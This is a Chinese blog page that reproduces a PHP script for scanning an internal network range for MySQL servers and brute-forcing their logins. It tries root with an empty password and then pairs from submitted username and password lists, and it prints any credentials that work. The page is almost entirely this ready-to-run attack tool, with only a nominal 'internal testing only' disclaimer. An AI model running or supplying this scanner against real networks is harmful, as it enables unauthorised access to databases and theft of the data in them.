vlambda博客
学习文章列表

内网扫mysql弱口令脚本(php)

<?php
echo "from 米的暗部@bbs.isilic.org 仅供内部测试,请勿用于非法用途。";
#Class B PHP port scanner by anthrax @ insight-labs.org
session_start();
set_time_limit(0);
ob_implicit_flush(True);
ob_end_flush();


function check_port($ip,$port,$timeout=0.1) {
$conn = @fsockopen($ip, $port, $errno, $errstr, $timeout);
if ($conn) {
fclose($conn);
return true;
}
}
function crackpwd($addr,$port,$userlist,$passlist,$type){
switch($type){


case 'mysql':


if(@mysql_connect($addr.':'.$port, 'root', '')){
echo 'MySQL Username: root EMPTY PASSWORD<br/>';
}
foreach($userlist as $username){
foreach($passlist as $pass){
if(@mysql_connect($addr.':'.$port, $username, $pass)){
echo 'MySQL Username: '.$username.' pwd: '.$pass.'<br/>';
}
}
}
break;


}
}


function scanip($ip,$timeout){
$portarr=array(
'3306'=>'MySQL Server'
);
foreach($portarr as $port=>$name){
if(check_port($ip,$port,$timeout=0.1)==True){
echo 'Port: '.$port.' '.$name.' is open<br/>';
@ob_flush();
@flush();


if(isset($_SESSION['crack'])||$_SESSION['crack']==true){
switch($port){


case '3306':
$type='mysql';
break;


default:
$type=false;
}
if($type){
global $userarr,$passarr;
crackpwd($ip,$port,$userarr,$passarr,$type);


@ob_flush();
@flush();
}


}//if
}
}
}


if(!isset($_SESSION['startip'])){
$_SESSION['startip']='Start IP';
$_SESSION['endip']='End IP';
$_SESSION['username']='···';
$_SESSION['password']='····';
}


echo '<html>
<form action="" method="post">
<input type="text" name="startip" value="'.$_SESSION['startip'].'" />
<input type="text" name="endip" value="'.$_SESSION['endip'].'" />
Timeout<input type="text" name="timeout" value="0.1" /><br/>
Auto Crack Password on MSSQL,MYSQL,Oracle,SSH,FTP
<input type="checkbox" name="crack" value="Crack password"><br/>
<textarea rows="10" cols="30" name="username">'.$_SESSION['username'].'
</textarea>
<textarea rows="10" cols="30" name="password">'.$_SESSION['password'].'
</textarea><br/>
<button type="submit" name="submit">Scan</button>
</form>
</html>
';
if(isset($_POST['startip'])&&isset($_POST['endip'])&&isset($_POST['timeout'])){
if(isset($_POST['crack'])){
global $userarr,$passarr;
$_SESSION['crack']=true;
$userarr=array_unique(explode("\n",str_replace("\r", "", $_POST['username'])));
$passarr=array_unique (explode("\n",str_replace("\r", "", $_POST['password'])));
$_SESSION['username']=$_POST['username'];
$_SESSION['password']=$_POST['password'];
}
$startip=$_POST['startip'];
$endip=$_POST['endip'];
$timeout=$_POST['timeout'];
$siparr=explode('.',$startip);
$eiparr=explode('.',$endip);
$ciparr=$siparr;
if(count($ciparr)!=4||$siparr[0]!=$eiparr[0]||$siparr[1]!=$eiparr[1]){
exit('IP error: Wrong IP address or Trying to scan class A address');
}
$_SESSION['startip']=$startip;
$_SESSION['endip']=$endip;
if($startip==$endip){
echo 'Scanning IP '.$startip.'<br/>';
@ob_flush();
@flush();
scanip($startip,$timeout);
@ob_flush();
@flush();
exit();
}


if($eiparr[3]!=255){
$eiparr[3]+=1;
}
while($ciparr!=$eiparr){
$ip=$ciparr[0].'.'.$ciparr[1].'.'.$ciparr[2].'.'.$ciparr[3];
echo '<br/>Scanning IP '.$ip.'<br/>';
@ob_flush();
@flush();
scanip($ip,$timeout);
$ciparr[3]+=1;


if($ciparr[3]>255){
$ciparr[2]+=1;
$ciparr[3]=0;
}
if($ciparr[2]>255){
$ciparr[1]+=1;
$ciparr[2]=0;
}
}
}else{
exit('Missing input');
}
?>